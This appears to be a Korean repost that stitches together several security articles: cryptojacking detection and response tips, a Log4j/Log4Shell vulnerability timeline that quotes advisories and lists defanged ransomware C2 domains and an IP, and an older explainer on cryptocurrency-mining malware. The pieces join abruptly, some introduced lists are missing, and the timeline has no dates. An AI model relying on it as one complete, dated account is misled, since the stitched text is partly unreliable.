"아웃바운드 연결 시작을 모니터링하는 서버에 좋은 이그레스 필터링이 있다면, 이는 [크립토마이닝 악성코드] 탐지에 좋을 수 있습니다."라고 Archaea Energy의 부사장 겸 CISO인 Travis Farral은 말합니다. 그러나 그는 크립토마이너 작성자가 해당 탐지 방법을 피하도록 악성코드를 작성할 수 있다고 경고합니다.
클라우드 모니터링 및 컨테이너 런타임 보안 사용. 클라우드 모니터링 및 컨테이너 런타임 보안 스캐닝과 같은 진화하는 도구는 승인되지 않은 크립토마이너의 영향을 받을 수 있는 클라우드 환경에 대한 추가 가시성을 제공할 수 있습니다. 클라우드 제공업체는 이러한 가시성을 서비스에 내장하고 있으며, 때로는 추가 기능으로 제공합니다. 예를 들어, Google Cloud는 올해 초 보안 명령 센터(Security Command Center)를 확장하여 VMTD(Virtual Machine Threat Detection)를 포함시켜 클라우드 내 크립토마이닝 징후 및 기타 클라우드 위협을 포착합니다.
정기적인 위협 헌트에 참여하세요. 많은 크립토재킹 공격이 은밀하고 흔적을 거의 남기지 않기 때문에, 조직은 위협 헌트와 같은 보다 적극적인 조치를 취하여 정기적으로 손상의 미묘한 징후를 찾고 조사를 수행해야 할 수도 있습니다.
"엔드포인트 보안 및 SOC 팀은 잠재적으로 재앙적인 일이 발생하기를 기다리는 대신 능동적인 훈련과 위협 헌트에 시간을 투자해야 합니다."라고 LogRhythm의 Vincent는 말합니다.
크립토마이닝 코드가 있는지 웹사이트를 모니터링하세요. Farral은 크립토재커들이 웹 서버에 Javascript 코드 조각을 배치하는 방법을 찾고 있다고 경고합니다. "서버 자체가 대상이 아니라, 웹사이트를 방문하는 사람이라면 누구나 [감염 위험이 있습니다]."라고 그는 말합니다. 그는 웹 서버의 파일 변경 사항이나 페이지 자체의 변경 사항을 정기적으로 모니터링할 것을 권장합니다.
불법 크립토마이닝 활동이 탐지된 후, 크립토재킹 공격에 대응하는 것은 차단, 제거, 복구, 교훈 습득을 포함하는 표준 사이버 사고 대응 절차를 따라야 합니다. 크립토재킹 공격 대응을 위한 몇 가지 팁은 다음과 같습니다.
웹 전달 스크립트 차단. 브라우저 내 JavaScript 공격의 경우, 크립토마이닝이 탐지되면 해결책은 간단합니다. 스크립트를 실행 중인 브라우저 탭을 종료하는 것입니다. IT 부서는 스크립트의 출처인 웹사이트 URL을 기록하고 회사의 웹 필터를 업데이트하여 차단해야 합니다.
손상된 컨테이너 인스턴스 종료. 코인 마이너로 손상된 컨테이너 인스턴스와 같은 변경 불가능한 클라우드 인프라는 감염된 컨테이너 인스턴스를 종료하고 새로 시작하여 간단히 처리할 수 있습니다. 그러나 조직은 컨테이너 손상으로 이어진 근본 원인을 먼저 파헤쳐야 합니다. 이는 컨테이너 대시보드와 자격 증명이 손상되었는지 징후를 찾고, 연결된 클라우드 리소스에서 손상 징후를 검사하는 것을 의미합니다. 중요한 단계는 이전 컨테이너를 대체할 새로운 컨테이너 이미지가 유사하게 구성되지 않도록 하는 것입니다.
권한 축소 및 API 키 재생성. 클라우드 기반 크립토재킹을 근절하고 완전히 복구하려면 조직은 영향을 받은 클라우드 리소스(및 이에 연결된 리소스)에 대한 권한을 축소하고 API 키를 재생성하여 공격자가 동일한 클라우드 환경으로 다시 침입하는 것을 방지해야 합니다.
학습 및 적응. 경험을 활용하여 공격자가 어떻게 시스템을 손상시킬 수 있었는지 더 잘 이해하십시오. 사용자, 헬프데스크, IT 및 SOC 분석가 교육을 업데이트하여 크립토재킹 시도를 더 잘 식별하고 이에 따라 대응할 수 있도록 하십시오.
편집자 주: 이 기사는 2018년 2월에 처음 게시되었으며, 새로운 연구, 모범 사례 및 크립토재킹 사례를 포함하도록 업데이트되었습니다.
Apache Log4j 취약점은 12월 초에 발견된 이후로 전 세계적인 헤드라인을 장식했습니다. 이 결함은 전 세계 수많은 조직에 영향을 미쳤으며, 보안 팀은 관련 위험을 완화하기 위해 분주히 움직였습니다. 다음은 Log4j 취약점을 둘러싼 주요 이벤트가 전개됨에 따른 타임라인입니다.
Apache는 수백만 개의 Java 기반 애플리케이션에서 사용되는 로깅 라이브러리인 Log4j의 치명적인 취약점에 대한 세부 정보를 공개했습니다. 공격자들은 CVSS 취약점 평가 척도에서 10점 만점에 10점을 받은 "Log4Shell"이라는 결함(CVE-2021-44228)을 악용하기 시작했습니다. 이는 취약한 애플리케이션을 실행하는 기본 서버에서 원격 코드 실행(RCE)으로 이어질 수 있습니다. "메시지 조회 대체가 활성화된 경우 로그 메시지 또는 로그 메시지 매개변수를 제어할 수 있는 공격자는 LDAP 서버에서 로드된 임의 코드를 실행할 수 있습니다."라고 Apache 개발자는 권고문에서 밝혔습니다. 이 문제에 대한 수정 사항은 Log4j 2.15.0 릴리스와 함께 제공되었으며, 전 세계 보안 팀이 조직을 보호하기 위해 노력했습니다. 기업들은 최신 버전을 설치하도록 촉구받았습니다.
취약점의 여파가 계속되면서, 영국 국가사이버보안센터(NCSC)는 영국 기업에 결함에 대한 공개 경고를 발령하고 완화 전략을 설명했습니다. NCSC는 모든 조직에 Log4j가 사용되는 것으로 알려진 모든 곳에서 즉시 최신 업데이트를 설치하도록 권고했습니다. "이는 Log4j를 포함하는 것으로 알려진 소프트웨어를 사용하는 모든 영국 조직의 최우선 과제여야 합니다. 조직은 인터넷 연결 소프트웨어와 비인터넷 연결 소프트웨어를 모두 업데이트해야 합니다."라는 성명서에서 밝혔습니다. 또한 기업들은 알려지지 않은 Log4j 인스턴스를 찾고 보호적인 네트워크 모니터링/차단을 배포하도록 촉구받았습니다.
영국 NCSC와 마찬가지로, 미국 사이버보안 및 인프라 보안국(CISA)은 Log4j 취약점에 대해 공개적으로 대응했으며, Jen Easterly 국장은 이 취약점이 네트워크 수비수에게 제시하는 긴급한 과제에 대해 언급했습니다. "CISA는 Log4j 소프트웨어 라이브러리를 포함하는 제품에 영향을 미치는 치명적인 취약점에 사전 대응하기 위해 공공 및 민간 부문 파트너와 긴밀히 협력하고 있습니다."라고 그녀는 성명서에서 말했습니다. "우리는 이 취약점의 완화를 추진하고 관련 위협 활동을 탐지하기 위해 긴급 조치를 취하고 있습니다. 우리는 이 취약점을 알려진 악용 취약점 카탈로그에 추가하여 연방 민간 기관이 이 취약점을 긴급히 패치하거나 수정하도록 강제하고, 비연방 파트너에게도 신호를 보내고 있습니다. 우리는 네트워크가 취약할 수 있는 기관에 사전에 연락하고 있으며, 스캐닝 및 침입 탐지 도구를 활용하여 정부 및 산업 파트너가 취약점에 대한 노출 또는 악용을 식별할 수 있도록 돕고 있습니다."
CISA는 자산 소유자에게 취약점 완화를 위해 다음과 같은 세 가지 추가적이고 즉각적인 조치를 취할 것을 권장했습니다:
Apache Log4j에 영향을 미치는 두 번째 취약점이 발견되었습니다. CVE 2021-45046으로 명명된 새로운 익스플로잇은 악의적인 행위자가 JNDI 조회 패턴을 사용하여 악의적인 입력 데이터를 제작하여 서비스 거부(DoS) 공격을 생성할 수 있도록 했습니다. CVE 설명에 따르면. 익스플로잇에 대한 새로운 패치가 제공되어 메시지 조회 패턴에 대한 지원을 제거하고 기본적으로 JNDI 기능을 비활성화했으며, 원래 결함에 대한 Log4j 2.15.0 수정 사항이 특정 비기본 구성에서 불완전했습니다.
"CVE-2021-45046이 원래 취약점보다 덜 심각하지만, 이는 위협 행위자가 패치되지 않았거나 부적절하게 패치된 시스템에 대해 악의적인 공격을 수행할 수 있는 또 다른 벡터가 됩니다."라고 Resilience의 위험 및 대응 책임자인 Amy Chang은 결함이 발견된 직후 CSO에 말했습니다. "CVE-2021-44228에 대한 불완전한 패치는 악의적인 입력 데이터를 제작하는 데 악용될 수 있으며, 이는 DoS 공격으로 이어질 수 있습니다. DoS 공격은 머신이나 네트워크를 종료시켜 의도된 사용자가 액세스할 수 없게 만들 수 있습니다."라고 그녀는 덧붙였습니다. 조직은 가능한 한 빨리 Log4j 2.16.0으로 업데이트하도록 권고받았습니다.
Apache는 세 번째 주요 Log4j 취약점에 대한 세부 정보를 공개하고 또 다른 수정 사항을 제공했습니다. 이는 10점 만점에 7.5점을 받은 무한 재귀 결함이었습니다. "Log4j 팀은 Log4j 2.17.0에서 Java 8 이상에 대해 해결된 CVE-2021-45105라는 보안 취약점을 인지하게 되었습니다."라고 밝혔습니다. "Apache Log4j2 버전 2.0-alpha1부터 2.16.0까지는 자기 참조적 조회로 인한 통제되지 않은 재귀로부터 보호하지 못했습니다. 로깅 구성이 컨텍스트 조회(예: $${ctx:loginId})와 함께 기본이 아닌 패턴 레이아웃을 사용하는 경우, Thread Context Map(MDC) 입력 데이터를 제어할 수 있는 공격자는 재귀적 조회를 포함하는 악의적인 입력 데이터를 제작하여 프로세스를 종료시키는 StackOverflowError를 발생시킬 수 있습니다. 이는 DoS(서비스 거부) 공격으로도 알려져 있습니다."
Apache는 또한 다음과 같은 완화 조치를 설명했습니다:
사이버보안 연구 그룹 Cryptolaemus는 Log4j 취약점이 Windows 기기를 Dridex 뱅킹 트로이목마로, Linux 기기를 Meterpreter로 감염시키는 데 악용되고 있다고 경고했습니다. Dridex는 Microsoft Word의 매크로를 사용하는 시스템을 통해 은행 자격 증명을 탈취하는 악성코드 형태이며, Meterpreter는 공격자가 대상 머신을 탐색하고 코드를 실행할 수 있는 대화형 셸을 제공하는 Metasploit 공격 페이로드입니다. Cryptolaemus 회원인 Joseph Roosen은 BleepingComputer에 위협 행위자가 Log4j RMI(Remote Method Invocation) 익스플로잇 변종을 사용하여 취약한 기기가 공격자 제어 원격 서버에서 Java 클래스를 로드하고 실행하도록 강제한다고 말했습니다.
사이버보안 업체 Tenable이 공개한 데이터에 따르면 전체 자산의 10%가 Log4Shell에 취약했으며, 조직의 30%는 이 버그에 대한 스캔을 시작하지 않은 것으로 나타났습니다. "평가된 자산 중 Log4Shell은 약 10%에서 발견되었으며, 여기에는 다양한 서버, 웹 애플리케이션, 컨테이너 및 IoT 장치가 포함됩니다."라고 Tenable 블로그 게시물은 밝혔습니다. "Log4Shell은 모든 산업과 지역에 걸쳐 널리 퍼져 있습니다. 기업 서버 10대 중 1대가 노출되어 있습니다. 웹 애플리케이션 10개 중 1개도 마찬가지입니다. 우리 디지털 인프라의 거의 모든 측면에서 10개 중 1개가 Log4Shell을 통한 악의적인 악용 가능성이 있습니다."
업체는 Log4Shell이 인프라와 애플리케이션 모두에 걸친 Log4j의 광범위함 때문에 EternalBlue(WannaCry 공격에서 악용됨)보다 더 큰 잠재적 위협을 지닌다고 경고했습니다. "역사상 어떤 단일 취약점도 이렇게 노골적으로 수정을 요구한 적은 없습니다. Log4Shell은 우리가 알고 있는 컴퓨팅을 정의할 것이며, 스스로를 보호하기 위해 노력한 사람들과 태만한 것을 편안해하는 사람들을 구분할 것입니다."라고 덧붙였습니다.
미국 연방거래위원회(FTC)는 미국 기관들에게 Log4Shell 취약점을 즉시 패치하거나, 그렇지 않을 경우 규제 기관의 제재 조치를 받을 위험이 있다고 촉구했습니다. “취약점이 발견되고 악용되면 개인정보 손실 또는 유출, 재정적 손실, 기타 돌이킬 수 없는 피해가 발생할 위험이 있습니다. 알려진 소프트웨어 취약점을 완화하기 위해 합리적인 조치를 취해야 할 의무는 연방거래위원회법 및 Gramm Leach Bliley Act를 비롯한 여러 법률과 관련됩니다.”라고 FTC가 밝혔습니다. 또한 Log4j에 의존하는 기업과 그 공급업체가 소비자에게 해를 끼칠 가능성을 줄이고 FTC의 법적 조치를 피하기 위해 지금 조치를 취하는 것이 중요하다고 덧붙였습니다. “FTC는 Log4j 또는 향후 유사한 알려진 취약점으로 인해 소비자 데이터가 노출되지 않도록 합리적인 조치를 취하지 않는 기업을 추적하기 위해 모든 법적 권한을 사용할 의도입니다.”
Microsoft는 중국 기반 랜섬웨어 운영자(DEV-0401)가 인터넷 연결 시스템을 대상으로 NightSky 랜섬웨어를 배포하고 있다는 세부 정보로 Log4j 취약점 지침 페이지를 업데이트했습니다. “1월 4일부터 공격자들은 VMware Horizon을 실행하는 인터넷 연결 시스템에서 CVE-2021-44228 취약점을 악용하기 시작했습니다.”라고 적혀 있습니다. “DEV-0401은 이전에 LockFile, AtomSilo, Rook을 포함한 여러 랜섬웨어 계열을 배포했으며, 유사하게 Confluence(CVE-2021-26084) 및 온프레미스 Exchange 서버(CVE-2021-34473)를 실행하는 인터넷 연결 시스템을 악용했습니다.” Microsoft의 분석에 따르면, 공격자는 합법적인 도메인을 스푸핑하는 명령 및 제어(CnC) 서버를 사용하는 것으로 밝혀졌습니다. 여기에는 service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, 139[.]180[.]217[.]203이 포함됩니다.
보안 101: 암호화폐 채굴 악성코드의 영향
호주 정부는 방금 디지털 통화를 합법적인 지불 수단으로 인정했습니다. 7월 1일부터 비트코인과 같은 디지털 통화를 사용한 구매는 이중 과세를 피하기 위해 호주의 상품 및 서비스세가 면제됩니다. 따라서 거래자와 투자자는 합법적인 거래 플랫폼을 통해 이를 사고 파는 데 세금이 부과되지 않습니다.
지난 4월 비트코인을 지불 수단으로 합법화한 일본은 이미 20,000개 이상의 가맹점이 비트코인 결제를 수용할 것으로 예상하고 있습니다. 다른 국가들도 부분적으로 동참하고 있습니다: 스위스의 기업과 일부 공공 기관, 노르웨이, 네덜란드입니다. 최근 연구에 따르면, 고유한 활성 암호화폐 지갑 사용자는 290만에서 580만 명 사이로 추정되며, 대부분은 북미와 유럽에 있습니다.
그러나 디지털 통화의 수용과 채택이 온라인 위협과 무슨 관련이 있을까요? 사실, 많은 관련이 있습니다. 비트코인과 같은 암호화폐가 현실에서 주목을 받으면서, 이를 남용하는 사이버 범죄 위협도 함께 증가할 것입니다. 하지만 정확히 어떻게? 이것이 기업과 일반 사용자에게 무엇을 의미할까요?
암호화폐는 통화 단위를 나타내는 암호화된 데이터 문자열입니다. 이는 블록체인이라고도 알려진 P2P 네트워크에 의해 모니터링되고 구성되며, 이 네트워크는 구매, 판매, 이체와 같은 거래의 안전한 원장 역할도 합니다. 물리적 화폐와 달리 암호화폐는 분산되어 있어 정부나 기타 금융 기관이 발행하지 않습니다.
암호화폐는 채굴이라고 하는 과정에서 유지 및 확인되는 암호화 알고리즘을 통해 생성(및 보안)됩니다. 이 과정에서는 컴퓨터 네트워크나 ASIC(Application-Specific Integrated Circuit)과 같은 특수 하드웨어가 거래를 처리하고 검증합니다. 이 과정은 네트워크를 운영하는 채굴자에게 암호화폐로 인센티브를 제공합니다.
실제로 700개 이상의 암호화폐가 있지만, 일부만이 활발히 거래되며 시가총액이 1억 달러를 넘는 것은 더 적습니다. 예를 들어 비트코인은 사토시 나카모토(가명)가 만들었으며 2009년 오픈소스 코드로 출시되었습니다. 블록체인 기술이 이를 작동하게 하여 데이터 구조(블록)가 통신 종점(노드) 네트워크를 통해 공개 분산 데이터베이스에 브로드캐스트되고 검증 및 등록되는 시스템을 제공합니다.
비트코인이 가장 유명한 암호화폐이지만, 다른 인기 있는 대안들도 있습니다. 이더리움은 "스마트 계약"을 한 단계 더 발전시켜 이를 코딩하는 데 필요한 프로그래밍 언어를 개발자에게 더 접근하기 쉽게 만들었습니다. 합의 또는 조건부/if-then 거래는 코드로 작성되어 이더리움의 블록체인에서(요구 사항이 충족되는 한) 실행됩니다.
그러나 이더리움은 해커가 이더리움 소프트웨어에서 실행되는 DAO(Digital Autonomous Organization)의 취약점을 악용하여 5천만 달러 상당의 이더(이더리움의 통화)를 빼돌리면서 악명을 얻었습니다. 이로 인해 원래 블록체인을 기반으로 한 이더리움 클래식과 업그레이드된 버전의 이더리움(하드 포크를 통해)이 개발되었습니다.
또 다른 주목할 만한 암호화폐로는 라이트코인, 도지코인, 모네로가 있습니다. 라이트코인은 Scrypt 채굴 알고리즘(비트코인은 SHA-256 사용)을 통해 더 빠른 처리 시간이 가능하다고 알려진 비트코인의 기술적 개선 버전입니다. 라이트코인 네트워크는 8,400만 개의 라이트코인(비트코인이 발행하는 통화 단위의 4배)을 생산할 수 있습니다. 모네로는 링 서명(디지털 서명의 한 유형)과 CryptoNote 애플리케이션 계층 프로토콜을 사용하여 거래의 프라이버시(금액, 출처, 목적지)를 보호하는 것으로 유명합니다. 도지코인은 처음에 교육 또는 엔터테인먼트 목적으로 개발되었으며 더 넓은 인구 통계를 대상으로 했습니다. 무제한의 도지코인을 생성할 수 있으며, 통화를 구동하기 위해 Scrypt도 사용합니다.
암호화폐에는 국경이 없습니다. 누구나 언제 어디서나 지연이나 중개인의 추가/숨겨진 수수료 없이 보낼 수 있습니다. 특성상 암호화폐는 위조가 불가능하고 개인 정보가 암호화 장벽 뒤에 있기 때문에 사기와 신원 도용으로부터 더 안전합니다.
안타깝게도, 암호화폐의 동일한 명백한 수익성, 편의성, 가명성은 랜섬웨어 운영자들이 보여주듯이 사이버 범죄자들에게도 이상적입니다. 암호화폐의 인기 증가는 시스템과 장치를 감염시켜 암호화폐 채굴 기계의 군대로 만드는 악성코드의 발생과 일치합니다.
암호화폐 채굴은 전용 프로세서, 그래픽 카드 및 기타 하드웨어의 상당한 리소스를 필요로 하는 계산 집약적인 작업입니다. 채굴이 돈을 버는 방법이기는 하지만 많은 단점이 있습니다. 수익은 하드웨어에 대한 채굴자의 투자에 비례하며, 전력 비용은 말할 것도 없습니다.
암호화폐는 블록 단위로 채굴됩니다. 예를 들어 비트코인에서는 특정 수의 해시가 해결될 때마다 블록당 채굴자에게 지급될 수 있는 비트코인 수가 절반으로 줄어듭니다. 비트코인 네트워크는 10분마다 암호화폐를 생성하도록 설계되어 있으므로, 다른 해시를 해결하는 난이도가 조정됩니다. 그리고 채굴 능력이 증가함에 따라 새 블록을 채굴하는 데 필요한 리소스 요구 사항이 늘어납니다. 지급액은 상대적으로 작으며 결국 4년마다 감소합니다. 2016년에는 블록 채굴 보상이 12.5 BTC(2017년 7월 5일 기준 약 $32,000)로 절반으로 줄었습니다. 결과적으로 많은 사람들이 채굴을 더 효율적으로 만들기 위해 풀에 힘을 합칩니다. 이익은 채굴자가 투입한 노력에 따라 그룹 내에서 분배됩니다.
나쁜 사람들은 이러한 문제를 우회하기 위해 악성코드를 사용합니다. 그러나 사이버 범죄 채굴자들에게는 한 가지 단점이 있습니다. 인터넷에 연결된 장치와 기계는 네트워크 데이터를 처리할 만큼 빠르지만, 방대한 수치 계산 능력은 없습니다. 이를 보완하기 위해 암호화폐 채굴 악성코드는 컴퓨터 봇넷을 좀비화하여 이러한 작업을 수행하도록 설계되었습니다. 다른 것들은 완전히 은밀함을 피했습니다. 2014년에는 하버드의 슈퍼컴퓨터 클러스터 Odyssey가 도지코인을 불법적으로 채굴하는 데 사용되었습니다. 같은 해, 미국 기관인 국립과학재단의 슈퍼컴퓨터에서도 유사한 사건이 발생했습니다. 2017년 2월 초, 미국 연방준비제도의 서버 중 하나가 비트코인 채굴에 오용되었습니다.
암호화폐 채굴 악성코드는 악성코드를 포함한 스팸 이메일, 악성 URL 다운로드, 정크웨어 및 잠재적으로 원치 않는 응용 프로그램(PUA)에 이르기까지 다른 많은 위협과 동일한 작전 방식을 사용합니다. 2014년 1월, Yahoo!의 Java 기반 광고 네트워크 취약점이 손상되어 유럽 최종 사용자에게 비트코인 채굴 악성코드를 전달하는 악성 광고가 노출되었습니다. 그 한 달 전, 독일 법 집행 기관은 악성코드를 사용하여 954,000달러 상당의 비트코인을 채굴한 혐의로 해커를 체포했습니다.
우리는 2011년부터 사이버 범죄 비트코인 채굴과 관련된 해킹 도구 및 백도어의 출현을 목격했으며, 그 이후로 분산 서비스 거부 및 URL 스푸핑과 같은 더 많은 기능을 추가하는 다양한 암호화폐 채굴 위협을 보아 왔습니다. 또 다른 위협은 Trend Micro 제품의 구성 요소로 위장하려고 시도하기도 했습니다. 2014년에는 위협이 Kagecoin으로 Android 기기로 확산되어 비트코인, 라이트코인, 도지코인을 채굴할 수 있었습니다. 중동 지하에서 널리 공유된 원격 접속 트로이목마(RAT) njrat/Njw0rm은 비트코인 채굴 기능을 추가하도록 수정되었습니다. 동일한 작업이 라이트코인을 채굴할 수 있는 오래된 Java RAT에도 적용되었습니다.
올해 주목할 만한 암호화폐 채굴 악성코드는 지금까지 Adylkuzz, CPUMiner/EternalMiner, Linux.MulDrop.14입니다. 모두 취약점을 악용합니다. Adylkuzz는 EternalBlue를 활용하는데, 이는 WannaCry 랜섬웨어가 파괴적인 효과를 내기 위해 사용한 것과 동일한 보안 결함입니다. 반면 CPUMiner/EternalMiner는 상호운용성 소프트웨어 제품군 Samba의 취약점인 SambaCry를 사용했습니다. Linux Trojan인 Linux.MulDrop.14는 Raspberry Pi 장치를 대상으로 합니다. 이러한 위협은 장치와 기계를 감염시켜 모네로 채굴 봇넷으로 전환했습니다.
암호화폐 채굴 악성코드는 감염된 기계의 리소스를 훔쳐 성능에 심각한 영향을 미치고 마모를 증가시킵니다. 감염에는 전력 소비 증가와 같은 다른 비용도 수반됩니다.
그러나 우리는 그 영향이 성능 문제를 넘어선다는 것을 발견했습니다. 2017년 1월 1일부터 6월 24일까지 우리 센서는 460,259건 이상의 비트코인 채굴 활동을 촉발한 4,894개의 비트코인 채굴자를 탐지했으며, 이러한 채굴자의 20% 이상이 웹 및 네트워크 기반 공격도 촉발한 것으로 나타났습니다. 우리는 랜섬웨어의 공격 벡터와 관련된 침입 시도까지 발견했습니다. 우리가 본 가장 널리 퍼진 공격은 다음과 같습니다:
이러한 악성코드는 네트워크 또는 시스템의 가용성, 무결성, 보안을 위협할 수 있으며, 잠재적으로 기업의 핵심 운영에 차질을 빚을 수 있습니다. 정보 도난 및 시스템 하이재킹도 우려스러운 결과입니다. 이러한 공격은 추가 악성코드가 전달되는 통로가 될 수도 있습니다.
사물 인터넷(IoT) 장치도 암호화폐 채굴 악성코드의 표적이 되고 있습니다. 디지털 비디오 레코더(DVR)/감시 카메라, 셋톱 박스, 네트워크 연결 스토리지(NAS) 장치, 특히 가정 및 기업 환경에서 널리 사용되는 라우터가 그 예입니다. 2017년 4월, Mirai의 변종이 비트코인 채굴 기능을 갖춘 채 등장했습니다. Mirai의 악명은 지난해 IoT 장치, 특히 가정용 라우터에서 혼란을 일으키고 이를 사용하여 주요 사이트를 오프라인으로 만드는 데서 비롯되었습니다. 2016년 처음 3분기 동안 우리는 Windows 시스템, 가정용 라우터, IP 카메라로 구성된 비트코인 채굴 좀비 군대를 탐지했습니다.
2017년 1월 1일부터 6월 24일까지 우리는 또한 비트코인을 채굴하고 있는 다양한 종류의 장치를 관찰했지만, 당사의 텔레메트리로는 이러한 활동이 승인되었는지 확인할 수 없습니다. 또한 비트코인 채굴 활동이 2017년 2월 일일 1,800건에서 3월 3,000건으로 40% 급증한 것을 확인했습니다.
비트코인 채굴이 본질적으로 불법은 아니지만(적어도 많은 국가에서), 소유자의 인지와 동의 없이 이루어지면 침해가 될 수 있습니다. 우리는 Windows를 실행하는 기계가 비트코인 채굴 활동이 가장 많았지만, 다음도 주목할 만합니다:
[읽기: Mirai 및 홈 네트워크 공격으로부터 라우터를 보호하는 방법]
암호화폐 채굴 악성코드는 시스템 성능을 저하시키고 최종 사용자와 기업을 정보 도난, 하이재킹 및 기타 다양한 악성코드에 노출시킬 위험이 있습니다. 그리고 이러한 기계를 좀비로 전환함으로써 암호화폐 악성코드는 의도치 않게 피해자를 문제의 일부로 만들 수도 있습니다.
실제로 감염된 장치, 궁극적으로는 비즈니스 자산이나 사용자 데이터에 미치는 부정적 영향은 이를 신뢰할 수 있는 위협으로 만듭니다. 이러한 악성코드에 대한 만병통치약은 없지만, 다음 모범 사례를 따르면 완화할 수 있습니다:
IT/시스템 관리자와 정보 보안 전문가는 애플리케이션 허용 목록 또는 의심스러운 실행 파일의 실행이나 설치를 방지하는 유사한 보안 메커니즘을 고려할 수 있습니다. 네트워크 트래픽을 사전 예방적으로 모니터링하면 맬웨어 감염을 나타낼 수 있는 위험 신호를 더 잘 식별하는 데 도움이 됩니다. 최소 권한 원칙을 적용하고, 웹 인젝션에 대한 대책을 개발하고, 이메일 게이트웨이를 보호하고, 기업 모바일 기기 모범 사례를 구현하며, 사이버 보안에 대한 인식을 갖춘 인력을 양성하는 것은 기업이 이러한 위협에 노출되는 것을 줄이기 위한 심층 방어 접근 방식의 일부입니다. 그러나 궁극적으로 암호화폐 채굴 맬웨어에 대한 인터넷 연결 기기의 보안은 사용자만의 부담이 아닙니다. 기존 설계 및 장비 제조업체도 생태계를 보호하는 데 중요한 역할을 합니다.
Telegram: https://t.me/cryptodeeptech
영상: https://youtu.be/PNDBjoT83zA
출처: https://cryptodeeptech.ru/log4j-vulnerability
